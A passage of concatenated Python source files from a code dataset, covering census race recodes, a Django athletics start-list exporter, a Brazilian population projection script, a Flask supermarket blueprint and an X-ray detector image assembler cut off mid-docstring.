(rels.isin(np.arange(25, 34)).any()):\n return 11\n elif (hhsize > 1) and (hhsex == 1) and (rels.isin([34, 35, 36]).any()):\n return 12\n elif (hhsize > 1) and (rels.isin([20]).all()):\n # TODO: we really shouldn't have this case\n # Need to know there is only one householder per unit to remove it\n return 11\n else:\n hh_id = household['hh_id'].iloc[0].item()\n raise ValueError(f\"Could not generate hht2 for household w/id: {hh_id}\\n\"\n f\"Household relationships: {list(rels)}\")\n \ndef get_cplt(household, rtype):\n hhsize = household.shape[0]\n rels = household['relationship']\n if (rtype == 4) or ((rtype == 2) and (hhsize <= 1)):\n return 0\n elif rels.isin([21]).any():\n return 1\n elif rels.isin([23]).any():\n return 2\n elif rels.isin([22]).any():\n return 3\n elif rels.isin([24]).any():\n return 4\n else:\n return 5\n\ndef get_upart(household, rtype):\n hhsize = household.shape[0]\n rels = household['relationship']\n hhsex = get_head_of_household(household)['sex_id'].item()\n sex_rels = zip(household['sex_id'], rels)\n if (rtype == 4) or (rtype == 2 and hhsize == 0):\n return 0\n elif (hhsize > 1) and (hhsex == 1) and ((1, 24) in sex_rels):\n return 1\n elif (hhsize > 1) and (hhsex == 1) and ((2, 22) in sex_rels):\n return 2\n elif (hhsize > 1) and (hhsex == 2) and ((2, 24) in sex_rels):\n return 3\n elif (hhsize > 1) and (hhsex == 2) and ((1, 22) in sex_rels):\n return 4 \n else:\n return 5\n\ndef get_multg(household, rtype):\n hhsize = household.shape[0]\n rels = household['relationship']\n if (rtype == 4) or (hhsize <= 2):\n return 0\n elif (rels.isin([25, 26, 27]).any() and rels.isin([30]).any()) or (rels.isin([29,31]).any()):\n return 2\n else:\n return 1\n\ndef get_hhldrage(household, rtype):\n hhsize = household.shape[0]\n hhage = get_head_of_household(household)['age'].item()\n if (rtype == 4) or (hhsize == 0):\n return 0\n elif (hhage < 25):\n return 1\n elif (hhage < 35):\n return 2\n elif (hhage < 45):\n return 3 \n elif (hhage < 55):\n return 4\n elif (hhage < 60):\n return 5\n elif (hhage < 65):\n return 6\n elif (hhage < 75):\n return 7\n elif (hhage < 85):\n return 8\n else:\n return 9\n\ndef get_hhspan(household, rtype):\n hhsize = household.shape[0]\n return get_head_of_household(household)['hispanic'].item() + 1\n # TODO: Specified recode (below) not accepted by validator\n # if (rtype == 4) or (hhsize == 0):\n # return 0\n # else:\n # return get_head_of_household(household)['hispanic'].item() + 1\n\ndef get_hhrace(household, rtype):\n hhsize = household.shape[0]\n householder = get_head_of_household(household)\n hhrace = get_cenrace(\n householder['racsor'].item(),\n householder['racnhpi'].item(),\n householder['racasn'].item(),\n householder['racaian'].item(),\n householder['racblk'].item(),\n householder['racwht'].item()\n )\n\n return hhrace\n\n # TODO: Specified recode (below) not accepted by validator\n # if (rtype == 4) or (hhsize == 0):\n # return 0\n # elif hhrace < 7:\n # return hhrace\n # else:\n # return 7\n\ndef get_paoc(household, rtype):\n hhsize = household.shape[0]\n household_under_6_rels = household[household['age'] < 6]['relationship']\n household_6_to_17_rels = household[(household['age'] >= 6) & (household['age'] <= 17)]['relationship']\n\n children_under_6 = household_under_6_rels.isin([25, 26, 27]).any()\n children_6_to_17 = household_6_to_17_rels.isin([25, 26, 27]).any()\n if (rtype == 4) or (hhsize == 0):\n return 0\n elif hhsize > 1 and children_under_6 and not children_6_to_17:\n return 1\n elif hhsize > 1 and not children_under_6 and children_6_to_17:\n return 2\n elif hhsize > 1 and children_under_6 and children_6_to_17:\n return 3\n else:\n return 4\n\ndef get_p18(household, rtype):\n if rtype == 2 and household[household['age'] < 18].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p60(household, rtype):\n if rtype == 2 and household[household['age'] >= 60].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p65(household, rtype):\n if rtype == 2 and household[household['age'] >= 65].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p75(household, rtype):\n if rtype == 2 and household[household['age'] >= 75].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_hhsex(household, rtype):\n hhsize = household.shape[0]\n if rtype == 4 or hhsize == 0:\n return 0\n else:\n return get_head_of_household(household)['sex_id'].item()\n\n\ndef get_cenrace(sor, nhpi, asn, aian, blk, wht):\n indicator_str = (str(int(sor))\n + str(int(nhpi))\n + str(int(asn))\n + str(int(aian))\n + str(int(blk))\n + str(int(wht)))\n if indicator_str == '000001': return 1\n elif indicator_str == '000010': return 2\n elif indicator_str == '000100': return 3\n elif indicator_str == '001000': return 4\n elif indicator_str == '010000': return 5\n elif indicator_str == '100000': return 6\n elif indicator_str == '000011': return 7\n elif indicator_str == '000101': return 8\n elif indicator_str == '001001': return 9\n elif indicator_str == '010001': return 10\n elif indicator_str == '100001': return 11\n elif indicator_str == '000110': return 12\n elif indicator_str == '001010': return 13\n elif indicator_str == '010010': return 14\n elif indicator_str == '100010': return 15\n elif indicator_str == '001100': return 16\n elif indicator_str == '010100': return 17\n elif indicator_str == '100100': return 18\n elif indicator_str == '011000': return 19\n elif indicator_str == '101000': return 20\n elif indicator_str == '110000': return 21\n elif indicator_str == '000111': return 22\n elif indicator_str == '001011': return 23\n elif indicator_str == '010011': return 24\n elif indicator_str == '100011': return 25\n elif indicator_str == '001101': return 26\n elif indicator_str == '010101': return 27\n elif indicator_str == '100101': return 28\n elif indicator_str == '011001': return 29\n elif indicator_str == '101001': return 30\n elif indicator_str == '110001': return 31\n elif indicator_str == '001110': return 32\n elif indicator_str == '010110': return 33\n elif indicator_str == '100110': return 34\n elif indicator_str == '011010': return 35\n elif indicator_str == '101010': return 36\n elif indicator_str == '110010': return 37\n elif indicator_str == '011100': return 38\n elif indicator_str == '101100': return 39\n elif indicator_str == '110100': return 40\n elif indicator_str == '111000': return 41\n elif indicator_str == '001111': return 42\n elif indicator_str == '010111': return 43\n elif indicator_str == '100111': return 44\n elif indicator_str == '011011': return 45\n elif indicator_str == '101011': return 46\n elif indicator_str == '110011': return 47\n elif indicator_str == '011101': return 48\n elif indicator_str == '101101': return 49\n elif indicator_str == '110101': return 50\n elif indicator_str == '111001': return 51\n elif indicator_str == '011110': return 52\n elif indicator_str == '101110': return 53\n elif indicator_str == '110110': return 54\n elif indicator_str == '111010': return 55\n elif indicator_str == '111100': return 56\n elif indicator_str == '011111': return 57\n elif indicator_str == '101111': return 58\n elif indicator_str == '110111': return 59\n elif indicator_str == '111011': return 60\n elif indicator_str == '111101': return 61\n elif indicator_str == '111110': return 62\n elif indicator_str == '111111': return 63\n else: raise ValueError('Incorrect race indicator: ' + indicator_str)\n\ndef get_race2010(nhpi, asn, aian, blk, wht):\n indicator_str = (str(int(nhpi))\n + str(int(asn))\n + str(int(aian))\n + str(int(blk))\n + str(int(wht)))\n if indicator_str == '00001': return 1\n elif indicator_str == '00010': return 2\n elif indicator_str == '00100': return 3\n elif indicator_str == '01000': return 4\n elif indicator_str == '10000': return 5\n elif indicator_str == '00011': return 6\n elif indicator_str == '00101': return 7\n elif indicator_str == '01001': return 8\n elif indicator_str == '10001': return 9\n elif indicator_str == '00110': return 10\n elif indicator_str == '01010': return 11\n elif indicator_str == '10010': return 12\n elif indicator_str == '01100': return 13\n elif indicator_str == '10100': return 14\n elif indicator_str == '11000': return 15\n elif indicator_str == '00111': return 16\n elif indicator_str == '01011': return 17\n elif indicator_str == '10011': return 18\n elif indicator_str == '01101': return 19\n elif indicator_str == '10101': return 20\n elif indicator_str == '11001': return 21\n elif indicator_str == '01110': return 22\n elif indicator_str == '10110': return 23\n elif indicator_str == '11010': return 24\n elif indicator_str == '11100': return 25\n elif indicator_str == '01111': return 26\n elif indicator_str == '10111': return 27\n elif indicator_str == '11011': return 28\n elif indicator_str == '11101': return 29\n elif indicator_str == '11110': return 30\n elif indicator_str == '11111': return 31\n elif indicator_str == '00000': return 1 # This means they are SOR which wasn't part of 2010... :( \n else: raise ValueError('Incorrect race indicator: ' + indicator_str)\n\ndef main():\n grfc_path, synth_path = get_script_args()\n\n print(\"Loading synthetic population dataframe...\")\n synth_df = load_synth_df(grfc_path, synth_path)\n\n hh_gb = synth_df.groupby(['geoid', 'hh_id'])\n\n mafids = gen_mafids(hh_gb)\n\n print(\"Building CEF person dataframe...\")\n per_df = build_per_df(synth_df, hh_gb, mafids)\n\n print(\"Writing CEF unit dataframe...\")\n write_unit_df(synth_df, per_df, hh_gb, mafids)\n\n print(\"Writing CEF person dataframe...\")\n per_df.to_csv('converted_synth_pop.cef', sep='|', index=False, header=False)\n\n print(\"Done!\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"util/convert_synth_pop.py","file_name":"convert_synth_pop.py","file_ext":"py","file_size_in_byte":21126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470375690","text":"import numpy as np\nimport mojimoji\nimport pandas as pd\n\nfrom django.db.models.aggregates import Count\nfrom django.db.models import Max\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Models\nfrom competitions.models import Comp, Event, EventStatus, GR as GRecord\nfrom organizer.models import Entry\nfrom organizer.templatetags.organizer_tags import format_mark\nfrom organizer.templatetags.organizer_filters import zen_to_han, sex_to_ja, race_section_to_ja\n\n\n\"\"\"\n上陸連携 ツール\n\"\"\" \nclass JyorikuTool:\n def __init__(self, comp):\n self.comp = comp # Comp オブジェクト\n \n \n \"\"\"\n Cardinal System: BackUp用CSV\n \"\"\"\n def start_list_cardinal(self):\n self.columns = ['section', 'sex', 'round', 'group', 'order_lane', 'event', 'bib', 'name', 'kana', 'grade', 'club', 'jaaf_branch', 'PB', 'entry_status']\n df = pd.DataFrame(columns=self.columns)\n\n # Entry オブジェクトの取得\n entries = Entry.objects.filter(event_status__comp=self.comp).order_by('event_status__event__name', '-event_status__section', 'event_status__event__sex', 'group', 'order_lane')\n for entry in entries:\n # print(entry)\n # 性別\n if entry.sex == 'M': sex = \"男\"\n elif entry.sex == 'W': sex = \"女\"\n else: sex = \"\"\n # 学年\n if entry.grade:grade = entry.grade\n else: grade = \"\"\n # 所属チーム\n if entry.club: club = entry.club\n else: club = \"\"\n # PB\n if entry.personal_best: pb = entry.personal_best\n else: pb = \"\"\n # Pandas Seriesを作成\n series = pd.Series([\n entry.event_status.section,\n sex,\n entry.event_status.match_round,\n entry.group,\n entry.order_lane,\n entry.event_status.event.name,\n entry.bib,\n entry.name_family+\"\\u3000\"+entry.name_first,\n mojimoji.zen_to_han(entry.kana_family+\"\\u3000\"+entry.kana_first),\n grade,\n club,\n entry.jaaf_branch,\n pb,\n entry.entry_status,\n ],index=self.columns)\n df = df.append(series, ignore_index = True)\n\n # d-type変換\n df[[\"group\",\"order_lane\"]]=df[[\"group\",\"order_lane\"]].astype(int)\n # print(df.head())\n # print(df.shape)\n\n return df\n\n \n\n\n\n \"\"\"\n 上陸用スタートリスト\n \"\"\"\n def start_list_jyoriku(self):\n df = self.start_list_cardinal()\n # print(df[df['group'] < 0].index)\n df = df.drop(df[df['group'] < 0].index)\n print(df.head(20))\n\n # 上陸形式に変換\n ## 空白\n df[\"space1\"] = [\"\" for i in range(len(df))]\n df[\"space2\"] = [\"\" for i in range(len(df))]\n # print(df.columns)\n ## 部門\n for i in df[df[\"section\"] == 'VS'].index:\n df.ix[i,\"section\"] = '対校'\n df[\"section\"] = df[\"sex\"] + df[\"section\"]\n ## ゼッケン番号\n # print(df[df['bib'].str.find('-') >= 0])\n for i in df[df['bib'].str.find('-') >= 0].index:\n df.ix[i, 'bib'] = str(df.ix[i, 'bib']).replace('-', '')[:5]\n ## 所属カナ\n df[\"club_kana\"] = [\"\" for i in range(len(df))]\n\n \n # 必要カラムの選択\n df = df.ix[:,['section', 'space1', 'event', 'group', 'order_lane', 'space2', 'bib', 'name', 'kana', 'grade', 'club', 'club_kana', 'jaaf_branch']]\n # print(df)\n \n return df\n \n","sub_path":"app/organizer/jyoriku.py","file_name":"jyoriku.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207496691","text":"class Person():\n sex = \"\"\n age = \"\"\n first_name = \"\"\n second_name = \"\"\n\n def __str__(self):\n return f\"\"\"\n Nominativo: {self.first_name} {self.second_name}\n Età: {self.age}\n Sesso: {self.sex}\n \"\"\"\n\n\nclass Student(Person):\n class_session = \"\"\n\n def __str__(self):\n return f\"\"\"\n Nominativo: {self.first_name} {self.second_name}\n Età: {self.age}\n Sesso: {self.sex}\n Classe frequentata: {self.class_session}\n \"\"\"\n\nclass Teacher(Person):\n pass\n\nperson = Student()\nperson.sex = \"m\"\nperson.age = \"45\"\nperson.first_name = \"Luca\"\nperson.second_name = \"Bellomi\"\nperson.class_session = \"3 B\"\n\nprint(person)\n","sub_path":"prova.py","file_name":"prova.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124073712","text":"#\n# DATA EXTRACTED FROM:\n#\n# FREIRE, F.H.M.A; GONZAGA, M.R; QUEIROZ, B.L. Projeção populacional municipal\n# com estimadores bayesianos, Brasil 2010 - 2030. In: Sawyer, D.O (coord.).\n# Seguridade Social Municipais. Projeto Brasil 3 Tempos. Secretaria Especial\n# de Assuntos Estratégicos da Presidência da República (SAE/SG/PR) , United\n# Nations Development Programme, Brazil (UNDP) and International Policy Centre\n# for Inclusive Growth. Brasília (IPC-IG), 2019\n#\nfrom pathlib import Path\n\nimport pandas as pd\n\nPATH = Path(__file__).parent.resolve()\nDEST = PATH / \"processed\"\n\n\ndef fix_columns(df, name):\n \"\"\"\n Create multi-index for male/female columns of age distributions\n \"\"\"\n df.columns = pd.MultiIndex.from_tuples(\n ((name, int(x)) for x in df.columns), names=[\"gender\", \"age\"]\n )\n return df\n\n\n# Read raw data and transform a few columns\ndata = pd.read_csv(PATH / \"age-distribution.csv.gz\")\ndata = data.drop(columns=[\"name\", \"state\", \"total\"])\ndata[\"id\"] = data.pop(\"code\").apply(lambda x: f\"BR-{x}\")\ndata[\"95\"] = data[\"100\"] = 0\n\nprint(\"Raw data loaded\")\n\n\n###############################################################################\n# Group by municipality and append two columns for male/female distributions\n\n\ndef T(df, gender):\n df = (\n df[df[\"gender\"] == gender]\n .set_index([\"id\", \"year\"])\n .drop(columns=\"gender\")\n .sort_index()\n .astype(\"int32\")\n )\n data = ((gender, int(x)) for x in df.columns)\n df.columns = pd.MultiIndex.from_tuples(data, names=[\"gender\", \"age\"])\n return df\n\n\ndata = data.replace({\"f\": \"female\", \"m\": \"male\"})\nmale = T(data, \"male\")\nfemale = T(data, \"female\")\ndata = pd.concat([female, male], axis=1)\n\n# Projections for Brazilian population pyramid. Override UN projections\nbrazil = (\n data.reset_index()\n .set_index(\"year\")\n .drop(columns=\"id\")\n .groupby(\"year\")\n .sum()\n .reset_index()\n)\nbrazil[\"id\"] = \"BR\"\ndata = data.append(brazil.set_index([\"id\", \"year\"]))\n\n\n###############################################################################\n# TODO: fix sub-regions\n\n# # Save data for municipalities\nprint(\"- Saving age pyramid\")\ndata.to_pickle(DEST / f\"yearly-age-pyramid-C1.pkl.gz\")\n\n# Save age distribution\nprint(\"- Saving age distribution (not separated by gender)\")\n(data[\"male\"] + data[\"female\"]).to_pickle(DEST / f\"yearly-age-distribution-C1.pkl\")\n\n# Save total population\nprint(\"- Saving total population projections\")\ndata.sum(1).to_pickle(DEST / f\"yearly-population-C1.pkl\")\nprint(\"Files saved\")\n\n\n###############################################################################\n# Filtering current year\n\nprint(\"Filtering current year...\")\nyear = 2020\npyramid = data.reset_index()\npyramid = pyramid[pyramid[\"year\"] == year].drop(columns=\"year\").set_index(\"id\")\n\n# Save data for current year\nprint(\"Saving age pyramid\")\npyramid.to_pickle(DEST / f\"age-pyramid-C1.pkl\")\n\nprint(\"Saving age distribution\")\n(pyramid[\"male\"] + pyramid[\"female\"]).to_pickle(DEST / f\"age-distribution-C1.pkl\")\n\nprint(\"Saving total populations\")\npop = pd.DataFrame({\"population\": pyramid.sum(1)})\npop.to_pickle(DEST / f\"population-C1.pkl\")\n\nprint(\"\\nCurrent year distributions saved!\")\n","sub_path":"data/BR/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45014261","text":"import os\nimport uuid\n\nfrom flask import Blueprint, render_template, request, session, url_for, redirect\n\nfrom flask_advanced.add_forms import SupermarketForm\nfrom flask_advanced.utils import get_data, add_data\n\nsupermarket = Blueprint(\"supermarket\", __name__, template_folder='templates', static_folder='static2')\n\nPATH_DATA = \"blueprint/Supermarkets/data.json\"\nPATH_STATIC = \"blueprint/Supermarkets/static2\"\n\ndata_supermarkets = get_data(PATH_DATA)\n\n\n@supermarket.route('/supermarket/supermarkets', methods=['GET'])\ndef get_supermarkets():\n return render_template('all_supermarkets.html', supermarkets=get_data(PATH_DATA))\n\n\n@supermarket.route('/supermarket/supermarkets', methods=['POST'])\ndef search_supermarkets():\n id_supermarket = request.form.get('id')\n location = request.form.get('location')\n data = []\n for i_supermarket in get_data(PATH_DATA):\n if i_supermarket['id'] == id_supermarket and i_supermarket['location'] == location:\n session[i_supermarket['id']] = True\n return render_template('all_supermarkets.html', supermarkets=i_supermarket,\n link_flags=session)\n elif i_supermarket['location'] == location:\n session[i_supermarket['location']] = True\n data.append(i_supermarket)\n elif i_supermarket['id'] == id_supermarket:\n session[i_supermarket['id']] = True\n data.append(i_supermarket)\n return render_template('all_supermarkets.html', supermarkets=data, link_flags=session)\n\n\n@supermarket.route('/supermarket/', methods=['GET'])\ndef get_supermarket(name_supermarket):\n for i_supermarket in get_data(PATH_DATA):\n if i_supermarket[\"name\"] == name_supermarket:\n return render_template('supermarket.html', supermarket=i_supermarket)\n else:\n return redirect(url_for('supermarket.get_supermarkets'))\n\n\n@supermarket.route('/supermarket/add_supermarket', methods=['GET'])\ndef add_supermarket():\n form_supermarket = SupermarketForm()\n return render_template('add_supermarket.html', form=form_supermarket)\n\n\n@supermarket.route('/supermarket/add_supermarket', methods=['POST'])\ndef add_supermarket_post():\n new_supermarket = {\"id\": str(uuid.uuid4()), \"name\": request.form.get('name'),\n \"location\": request.form.get('location')}\n image = request.files['image']\n new_supermarket[\"img_name\"] = image.filename\n path = os.path.join(PATH_STATIC, image.filename)\n image.save(path)\n data_supermarkets.append(new_supermarket)\n add_data(data_supermarkets, PATH_DATA)\n return redirect(url_for('supermarket.get_supermarkets'))\n\n\n","sub_path":"flask_advanced/blueprint/Supermarkets/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489646103","text":"\"\"\"\nDistributed under the terms of the BSD 3-Clause License.\n\nThe full license is in the file LICENSE, distributed with this software.\n\nAuthor: Jun Zhu \nCopyright (C) European X-Ray Free-Electron Laser Facility GmbH.\nAll rights reserved.\n\"\"\"\nfrom abc import ABC, abstractmethod\n\nimport json\nimport numpy as np\n\nfrom extra_data import stack_detector_data\n\nfrom .base_processor import _BaseProcessor, _RedisParserMixin\nfrom ..exceptions import AssemblingError\nfrom ...config import config, GeomAssembler, DataSource\nfrom ...database import Metadata as mt\nfrom ...ipc import process_logger as logger\nfrom ...utils import profiler\n\n\n_IMAGE_DTYPE = config['SOURCE_PROC_IMAGE_DTYPE']\n_RAW_IMAGE_DTYPE = config['SOURCE_RAW_IMAGE_DTYPE']\n\n\nclass ImageAssemblerFactory(ABC):\n\n class BaseAssembler(_BaseProcessor, _RedisParserMixin):\n \"\"\"Abstract ImageAssembler class.\n\n Attributes:\n _require_geom (bool): whether a Geometry is required to assemble\n the detector modules.\n _stack_only (bool): whether simply stack all modules seamlessly\n together.\n _mask_tile (bool): whether to mask the tile of each module\n if applicable.\n _assembler_type (GeomAssembler): Type of geometry assembler,\n which can be EXtra-foam or EXtra-geom.\n _geom_file (str): full path of the geometry file.\n _quad_position (list): (x, y) coordinates for the corners of 4\n quadrants.\n _geom: geometry instance in use.\n _out_array (numpy.ndarray): buffer to store the assembled modules.\n \"\"\"\n def __init__(self):\n \"\"\"Initialization.\"\"\"\n super().__init__()\n\n self._require_geom = config['REQUIRE_GEOMETRY']\n self._stack_only = False\n self._mask_tile = False\n self._assembler_type = None\n self._geom_file = None\n self._quad_position = None\n self._geom = None\n self._out_array = None\n\n def update(self):\n if self._require_geom:\n cfg = self._meta.hget_all(mt.GEOMETRY_PROC)\n\n assembler_type = GeomAssembler(int(cfg[\"assembler\"]))\n stack_only = cfg[\"stack_only\"] == 'True'\n geom_file = cfg[\"geometry_file\"]\n quad_positions = json.loads(cfg[\"quad_positions\"],\n encoding='utf8')\n\n image_proc_cfg = self._meta.hget_all(mt.IMAGE_PROC)\n mask_tile = image_proc_cfg[\"mask_tile\"] == 'True'\n if mask_tile != self._mask_tile:\n self._mask_tile = mask_tile\n if mask_tile:\n # Reset the out array when mask_tile is switched from\n # False to True. Otherwise, edge pixels from the\n # previous train will remain there forever as the\n # \"mask_tile\" here is actually called\n # \"ignore_tile_edge\" in the corresponding function.\n self._out_array = None\n\n # reload geometry if any of the following 4 fields changed\n if stack_only != self._stack_only or \\\n assembler_type != self._assembler_type or \\\n geom_file != self._geom_file or \\\n quad_positions != self._quad_position:\n\n self._stack_only = stack_only\n self._assembler_type = assembler_type\n self._quad_position = quad_positions\n\n self._geom = None # reset first\n self._load_geometry(geom_file, quad_positions)\n # caveat: if _load_geometry raises, _geom_file will not\n # be set. Therefore, _load_geometry will raise\n # AssemblingError in the next train.\n self._geom_file = geom_file\n\n if not stack_only:\n logger.info(f\"Loaded geometry from {geom_file} with \"\n f\"quadrant positions {quad_positions}\")\n\n @abstractmethod\n def _get_modules_bridge(self, data, src):\n \"\"\"Get modules data from bridge.\"\"\"\n pass\n\n @abstractmethod\n def _get_modules_file(self, data, src):\n \"\"\"Get modules data from file.\"\"\"\n pass\n\n def _load_geometry(self, filepath, quad_positions):\n \"\"\"Load geometry from file.\n\n Required for modular detectors which must be assembled with\n a geometry.\n\n If the assembler type is not defined, it uses EXtra-geom by default.\n\n :param str filepath: path of the geometry file.\n :param tuple quad_positions: quadrant coordinates.\n \"\"\"\n raise NotImplementedError\n\n def _assemble(self, modules):\n \"\"\"Assemble modules data into assembled image data.\n\n :param array-like modules: modules data. shape = (memory cells,\n modules, y, x) for pulse-resolved detectors and (y, x) for\n train-resolved detectors.\n\n :return numpy.ndarray assembled: assembled detector image(s).\n shape = (memory cells, y, x) for pulse-resolved detectors\n and (y, x) for train resolved detectors.\n \"\"\"\n image_dtype = config[\"SOURCE_PROC_IMAGE_DTYPE\"]\n if self._geom is not None:\n n_modules = modules.shape[1]\n if n_modules == 1:\n # single module operation\n return modules.astype(image_dtype).squeeze(axis=1)\n\n n_pulses = modules.shape[0]\n if self._out_array is None or self._out_array.shape[0] != n_pulses:\n self._out_array = self._geom.output_array_for_position_fast(\n extra_shape=(n_pulses, ), dtype=image_dtype)\n try:\n self._geom.position_all_modules(modules,\n out=self._out_array,\n ignore_tile_edge=self._mask_tile)\n # EXtra-foam raises ValueError while EXtra-geom raises\n # AssertionError if the shape of the output array does not\n # match the expected one, e.g. after a change of quadrant\n # positions during runtime.\n except (ValueError, AssertionError):\n # recreate the output array\n self._out_array = self._geom.output_array_for_position_fast(\n extra_shape=(n_pulses, ), dtype=image_dtype)\n self._geom.position_all_modules(modules,\n out=self._out_array,\n ignore_tile_edge=self._mask_tile)\n\n return self._out_array\n\n # temporary workaround for Pulse resolved JungFrau without geometry\n if config[\"DETECTOR\"] == \"JungFrauPR\":\n shape = modules.shape\n # Stacking modules vertically along y axis.\n return modules.reshape(shape[0], -1, shape[-1])\n\n # For train-resolved detector, assembled is a reference\n # to the array data received from the pyzmq. This array data\n # is only readable since the data is owned by a pointer in\n # the zmq message (it is not copied). However, other data\n # like data['metadata'] is writeable.\n # FIXME: why once a while this takes a few ms???\n return modules.astype(image_dtype)\n\n @profiler(\"Image Assembler\")\n def process(self, data):\n \"\"\"Override.\"\"\"\n meta = data['meta']\n raw = data['raw']\n catalog = data[\"catalog\"]\n\n src = catalog.main_detector\n src_type = meta[src]['source_type']\n try:\n if src_type == DataSource.FILE:\n modules_data = self._get_modules_file(raw, src)\n elif src_type == DataSource.BRIDGE:\n modules_data = self._get_modules_bridge(raw, src)\n else:\n raise ValueError(f\"Unknown source type: {src_type}\")\n\n # Remove raw detector data since we do not want to serialize\n # it and send around.\n raw[src] = None\n\n except (ValueError, IndexError, KeyError) as e:\n raise AssemblingError(repr(e))\n\n shape = modules_data.shape\n ndim = len(shape)\n try:\n n_modules = config[\"NUMBER_OF_MODULES\"]\n module_shape = config[\"MODULE_SHAPE\"]\n\n # check module shape\n # (BaslerCamera has module shape (-1, -1))\n if module_shape[0] > 0 and shape[-2:] != module_shape:\n raise ValueError(f\"Expected module shape {module_shape}, \"\n f\"but get {shape[-2:]} instead!\")\n\n # check number of modules\n if ndim >= 3 and shape[-3] != n_modules:\n n_modules_actual = shape[-3]\n if config[\"DETECTOR\"] != \"JungFrauPR\":\n # allow single module operation\n if n_modules_actual != 1:\n raise ValueError(f\"Expected {n_modules} modules, but get \"\n f\"{n_modules_actual} instead!\")\n elif n_modules_actual > 2:\n raise ValueError(f\"Expected 1 or 2 modules, but get \"\n f\"{n_modules_actual} instead!\")\n\n # check number of memory cells\n if ndim == 4 and not shape[0]:\n raise ValueError(\"Number of memory cells is zero!\")\n\n except ValueError as e:\n raise AssemblingError(e)\n\n data['assembled'] = {\n 'data': self._assemble(modules_data),\n }\n # Assign the global train ID once the main detector was\n # successfully assembled.\n raw[\"META timestamp.tid\"] = meta[src][\"tid\"]\n\n class AgipdImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Should work for both raw and calibrated data, according to DSSC.\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[1] == config[\"MODULE_SHAPE\"][1]:\n # Reshaping could have already been done upstream (e.g.\n # at the PipeToZeroMQ device), if not:\n # (modules, fs, ss, pulses) -> (pulses, modules, ss, fs)\n # (modules, x, y, memory cells) -> (memory cells, modules, y, x)\n return np.transpose(modules_data, (3, 0, 2, 1))\n # (memory cells, modules, y, x)\n return modules_data\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. The layout of data for each module is:\n - calibrated, (memory cells, x, y)\n - raw, (memory cells, 2, x, y)\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 2, modules, y, x)\n [:, 0, ...] -> data\n [:, 1, ...] -> gain\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=False)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data[:, 0, ...]\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import AGIPD_1MGeometryFast\n\n if self._stack_only:\n self._geom = AGIPD_1MGeometryFast()\n else:\n try:\n # catch any exceptions here since it loads the CFEL\n # geometry file with a CFEL function\n self._geom = AGIPD_1MGeometryFast.from_crystfel_geom(\n filename)\n except Exception as e:\n raise AssemblingError(e)\n else:\n from ...geometries import AGIPD_1MGeometry\n\n try:\n # catch any exceptions here since it loads the CFEL\n # geometry file with a CFEL function\n self._geom = AGIPD_1MGeometry.from_crystfel_geom(filename)\n except Exception as e:\n raise AssemblingError(e)\n\n class LpdImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Should work for both raw and calibrated data, according to DSSC.\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n return np.moveaxis(np.moveaxis(data[src], 3, 0), 3, 2)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. The layout of data for each module is:\n - calibrated, (memory cells, x, y)\n - raw, (memory cells, 1, x, y)\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 1, modules, y, x)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=True)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data.squeeze(axis=1)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import LPD_1MGeometryFast\n\n if self._stack_only:\n self._geom = LPD_1MGeometryFast()\n else:\n try:\n self._geom = LPD_1MGeometryFast.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n else:\n from ...geometries import LPD_1MGeometry\n\n try:\n self._geom = LPD_1MGeometry.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n\n class DsscImageAssembler(BaseAssembler):\n\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n In the file, the data is separated into arrays of different\n modules. The layout of data for each module is:\n - calibrated, 